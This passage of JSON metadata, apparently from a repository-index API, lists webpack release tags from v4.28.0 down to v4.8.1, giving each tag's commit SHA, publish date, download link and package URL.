"published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpa